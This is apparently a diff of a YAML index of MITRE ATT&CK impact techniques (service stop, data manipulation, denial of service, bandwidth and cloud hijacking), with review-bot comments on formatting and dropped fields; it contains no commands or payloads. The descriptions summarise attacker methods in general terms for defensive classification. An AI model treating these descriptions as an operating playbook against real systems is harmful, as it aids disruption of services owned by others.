+ x_mitre_detection: Where applicable, inspect important file hashes, locations,
+ and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ - 'File: File Creation'
+ - 'File: File Deletion'
+ x_mitre_impact_type:
+ - Integrity
type: attack-pattern
id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
created: '2020-03-02T14:22:24.410Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.001
url: https://attack.mitre.org/techniques/T1565/001
+ external_id: T1565.001
- source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
description: Department of Justice. (2018, September 6). Criminal Complaint
- United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
- source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
- Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Stored Data Manipulation
- x_mitre_detection: Where applicable, inspect important file hashes, locations,
- and modifications for suspicious/unexpected values.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'File: File Modification'
- - 'File: File Creation'
- - 'File: File Deletion'
- x_mitre_impact_type:
- - Integrity
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1489:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
- created: '2019-03-29T19:00:55.901Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1489
- url: https://attack.mitre.org/techniques/T1489
- - source_name: SecureWorks WannaCry Analysis
- url: https://www.secureworks.com/research/wcry-ransomware-analysis
- description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
- Analysis. Retrieved March 26, 2019.
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Novetta Blockbuster
- url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
- description: 'Novetta Threat Research Group. (2016, February 24). Operation
- Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
- 25, 2016.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-12T15:57:27.380Z'
+ name: Service Stop
description: "Adversaries may stop or disable services on a system to render
those services unavailable to legitimate users. Stopping critical services
or processes can inhibit or stop response to an incident or aid in the adversary's
overall objectives to cause damage to the environment.(Citation: Talos Olympic
Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
this by disabling individual services of high importance to an organization,
- such as MSExchangeIS
, which will make Exchange content inaccessible
- (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
- many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+ such as MSExchangeIS
, which will make Exchange content inaccessible.(Citation:
+ Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+ all services to render systems unusable.(Citation: Talos Olympic Destroyer
2018) Services or processes may not allow for modification of their data stores
while running. Adversaries may stop services or processes in order to conduct
[Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Service Stop
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
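Review bot: the T1489 description breaks the line between `such as MSExchangeIS` and `, which will make Exchange content inaccessible` on both the removed and the added side, and those two continuation lines carry no diff prefix at all, so the raw line break is inside the YAML scalar; a line break in a double-quoted scalar folds to a space and the text comes out as `MSExchangeIS , which`. The same break appears after `ChangeServiceConfigW` in the detection text in the next hunk. It looks like inline markup around the identifier was stripped when the entry was generated, so the fix belongs in the generator rather than in this file. The substantive change in the T1565.001 part of the hunk is the FireEye APT38 reference moving from content.fireeye.com/apt/rpt-apt38 to the mandiant.com PDF; `source_name` stays `FireEye APT38 Oct 2018`, which is right, since the `(Citation: ...)` markers in the description key off it. Everything else in the hunk is key reordering.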
@@ -63656,10 +64411,14 @@ impact:
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW
may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Process: Process Termination'
@@ -63670,39 +64429,37 @@ impact:
- 'Service: Service Metadata'
x_mitre_impact_type:
- Availability
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+ created: '2019-03-29T19:00:55.901Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1489
+ external_id: T1489
+ - source_name: SecureWorks WannaCry Analysis
+ description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+ Analysis. Retrieved March 26, 2019.
+ url: https://www.secureworks.com/research/wcry-ransomware-analysis
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Novetta Blockbuster
+ description: 'Novetta Threat Research Group. (2016, February 24). Operation
+ Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+ 25, 2016.'
+ url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1489
atomic_tests: []
T1499.004:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
- type: attack-pattern
- created: '2020-02-20T15:37:27.052Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1499.004
- url: https://attack.mitre.org/techniques/T1499/004
- - source_name: Sucuri BIND9 August 2015
- url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
- description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
- in the Wild. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T15:42:23.001Z'
name: Application or System Exploitation
description: "Adversaries may exploit software vulnerabilities that can cause
an application or system to crash and deny availability to users. (Citation:
@@ -63720,13 +64477,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Attacks targeting web applications may generate logs in the
web server, application server, and/or database server that can be used to
identify the type of attack. Externally monitor the availability of services
that may be targeted by an Endpoint DoS.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -63734,36 +64498,27 @@ impact:
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1565.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
type: attack-pattern
- created: '2020-03-02T14:30:05.252Z'
+ id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+ created: '2020-02-20T15:37:27.052Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.003
- url: https://attack.mitre.org/techniques/T1565/003
- - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- url: https://content.fireeye.com/apt/rpt-apt38
- source_name: FireEye APT38 Oct 2018
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1499/004
+ external_id: T1499.004
+ - source_name: Sucuri BIND9 August 2015
+ description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+ in the Wild. Retrieved April 26, 2019.
+ url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1565.003:
+ technique:
+ modified: '2024-10-15T18:21:43.760Z'
name: Runtime Data Manipulation
description: |-
Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
@@ -63772,11 +64527,17 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Inspect important application binary file hashes, locations,
and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'File: File Deletion'
@@ -63785,17 +64546,31 @@ impact:
- 'File: File Creation'
x_mitre_impact_type:
- Integrity
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+ created: '2020-03-02T14:30:05.252Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/003
+ external_id: T1565.003
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1498.002:
technique:
- modified: '2023-03-30T21:01:41.052Z'
+ modified: '2024-10-15T16:04:34.495Z'
name: Reflection Amplification
description: |-
Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
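Review bot: `x_mitre_permissions_required` (User, Administrator, root, SYSTEM) is removed from T1565.003 and nothing in this hunk or the two preceding T1565.003 hunks re-adds it, unlike the other keys in this diff that are only moved to the end of the entry. If any tooling filters or displays techniques by required permissions this is a behavioural change and should be named in the commit message; if upstream dropped the field, say so there as well.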
@@ -63804,6 +64579,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
before the traffic volume is sufficient to cause impact to the availability
of the service, but such response time typically requires very aggressive
@@ -63819,17 +64595,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Sensor Health: Host Status'
- 'Network Traffic: Network Traffic Flow'
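Review bot: The platform list for T1498.002 drops Azure AD, Office 365, SaaS and Google Workspace with nothing added in their place, whereas T1657 further down in this diff replaces Office 365 and Google Workspace with `Office Suite`. Please confirm the drop matches the upstream STIX this sync pulled, since the per-platform index CSVs derived from this file will stop listing T1498.002 for those platforms. The `- x_mitre_modified_by_ref` line in this hunk is a move rather than a deletion: the same line is re-added at the bottom of the object in a later hunk.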
@@ -63839,14 +64610,15 @@ impact:
id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
created: '2020-03-02T20:08:03.691Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1498/002
external_id: T1498.002
- - source_name: Cloudflare ReflectionDoS May 2017
- description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
- (attacks). Retrieved April 23, 2019.
- url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- source_name: Cloudflare DNSamplficationDoS
description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
April 23, 2019.
@@ -63855,28 +64627,28 @@ impact:
description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
April 23, 2019.
url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+ - source_name: Cloudflare ReflectionDoS May 2017
+ description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+ (attacks). Retrieved April 23, 2019.
+ url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cloudflare Memcrashed Feb 2018
+ description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+ - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+ url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- source_name: Arbor AnnualDoSreport Jan 2018
description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
Infrastructure Security Report. Retrieved April 22, 2019.
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- - source_name: Cloudflare Memcrashed Feb 2018
- description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
- - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
- url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- - source_name: Cisco DoSdetectNetflow
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1499.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:05:48.014Z'
name: Service Exhaustion Flood
description: |-
Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
@@ -63887,7 +64659,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -63898,17 +64669,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -63945,7 +64711,8 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491:
technique:
@@ -63966,7 +64733,7 @@ impact:
- source_name: mitre-attack
external_id: T1491
url: https://attack.mitre.org/techniques/T1491
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:42.056Z'
name: Defacement
description: "Adversaries may modify visual content available internally or
externally to an enterprise network, thus affecting the integrity of the original
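Review bot: The `modified` timestamp for T1491 moves backwards here, from '2022-05-11T14:00:00.188Z' to '2022-03-25T19:34:42.056Z'; the same regression appears below for T1491.001 ('2022-11-08' to '2022-07-28') and T1486 ('2022-11-08' to '2022-06-16'). Every other `modified` change in this diff moves forward to 2024, so either these three objects were regenerated from a different bundle or the earlier values were synthetic. Please state which in the PR description so the regression is not mistaken for a stale source.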
@@ -63993,12 +64760,78 @@ impact:
x_mitre_impact_type:
- Integrity
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ atomic_tests: []
+ T1496.002:
+ technique:
+ modified: '2024-09-25T14:59:35.287Z'
+ name: Bandwidth Hijacking
+ description: "Adversaries may leverage the network bandwidth resources of co-opted
+ systems to complete resource-intensive tasks, which may impact system and/or
+ hosted service availability. \n\nAdversaries may also use malware that leverages
+ a system's network bandwidth as part of a botnet in order to facilitate [Network
+ Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+ to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+ in proxyjacking by selling use of the victims' network bandwidth and IP address
+ to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+ in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+ Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+ financial costs or availability disruptions, this technique may cause reputational
+ damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+ Proxyjacking)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - IaaS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'File: File Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Connection Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+ created: '2024-09-25T13:44:35.412Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/002
+ external_id: T1496.002
+ - source_name: Sysdig Proxyjacking
+ description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+ Chat. Retrieved July 6, 2023.
+ url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+ - source_name: Unit 42 Leaked Environment Variables 2024
+ description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+ Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+ Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+ url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+ - source_name: GoBotKR
+ description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+ Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+ url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1657:
technique:
- modified: '2024-04-11T20:22:14.359Z'
+ modified: '2024-10-15T15:58:10.254Z'
name: Financial Theft
description: "Adversaries may steal monetary resources from targets through
extortion, social engineering, technical theft, or other methods aimed at
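Review bot: T1491 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` in this hunk and, within the visible lines, gains no replacement, while the other objects in this diff are set to `x_mitre_attack_spec_version: 3.2.0`. Check whether the field now appears elsewhere in the T1491 object or was dropped by the generator. Separately, the new T1496.002 object is inserted between T1491 and T1657 (and T1491.001 follows T1657), so the `impact` map is not sorted by technique id; emitting keys in sorted order would make future syncs easier to review.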
@@ -64031,7 +64864,7 @@ impact:
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
- Pawel Partyka, Microsoft Threat Intelligence
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -64041,10 +64874,9 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
@@ -64107,7 +64939,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1491.001:
technique:
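Review bot: `spec_version: '2.1'` is removed from this and every other technique object in the diff without a replacement. That field is what marks each object as a STIX 2.1 object, so confirm that no script consuming this index (or the CSVs derived from it) keys on it before merging.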
@@ -64148,7 +64979,7 @@ impact:
messages. Since internally defacing systems exposes an adversary''s presence,
it often takes place after other intrusion goals have been accomplished.(Citation:
Novetta Blockbuster Destructive Malware)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-28T18:55:35.988Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Defacement: Internal Defacement'
x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -64169,9 +65000,157 @@ impact:
- Integrity
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1491.001
atomic_tests: []
+ T1496.004:
+ technique:
+ modified: '2024-10-16T17:59:27.535Z'
+ name: Cloud Service Hijacking
+ description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+ applications to complete resource-intensive tasks, which may impact hosted
+ service availability. \n\nFor example, adversaries may leverage email and
+ messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+ Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+ spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+ messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+ 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+ in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+ AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+ 2024)\n\nIn some cases, adversaries may leverage services that the victim
+ is already using. In others, particularly when the service is part of a larger
+ cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+ 2024) Leveraging SaaS applications may cause the victim to incur significant
+ financial costs, use up service quotas, and otherwise impact availability. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+ created: '2024-09-25T14:05:59.910Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/004
+ external_id: T1496.004
+ - source_name: SentinelLabs SNS Sender 2024
+ description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+ Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+ url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+ - source_name: Invictus IR DangerDev 2024
